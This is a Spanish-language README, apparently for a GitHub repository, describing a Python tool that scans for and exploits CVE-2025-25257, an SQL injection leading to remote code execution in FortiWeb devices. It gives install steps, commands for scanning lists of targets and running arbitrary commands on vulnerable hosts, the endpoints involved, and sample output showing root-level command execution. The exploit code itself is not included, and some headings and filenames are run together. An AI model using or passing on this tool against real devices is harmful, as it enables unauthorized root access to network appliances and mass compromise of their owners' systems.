
Una herramienta basada en Python para comprobar y explotar la vulnerabilidad CVE-2025-25257 en dispositivos FortiWeb. Esta vulnerabilidad permite la inyección SQL y la ejecución remota de código a través de una cabecera Authorization manipulada.
CVE-2025-25257 es una vulnerabilidad crítica en dispositivos FortiWeb que permite:
pip install requests urllib3
git clone https://github.com/yourusername/CVE-2025-25257.git
cd CVE-2025-25257
pip install -r requirements.txt
vuln_check.py)Comprueba un único objetivo:
python3 vuln_check.py -t https://target.com
Comprueba múltiples objetivos desde un archivo:
python3 vuln_check.py -l target.txt
exp.py)Ejecuta comandos en un objetivo vulnerable:
python3 exp.py -t https://target.com -c "id"
vuln_check.py - Comprobador y exploit de vulnerabilidad principalexp.py - Herramienta de ejecución de comandos para objetivos vulnerablestarget.txt - Lista de ejemplo de objetivos (reemplázala por la tuya)vuln.txt - Archivo de salida con objetivos vulnerables (generado tras el escaneo)/api/fabric/device/status/cgi-bin/x.cgiLa herramienta genera un archivo vuln.txt que contiene:
Ejemplo de salida:
# CVE-2025-25257 Vulnerable Targets - 2025-01-27 10:30:15
# Format: [timestamp] target - command_output
[2025-01-27 10:30:15] https://target.com - uid=0(root) gid=0(root) groups=0(root)
créditos:0xbigshaq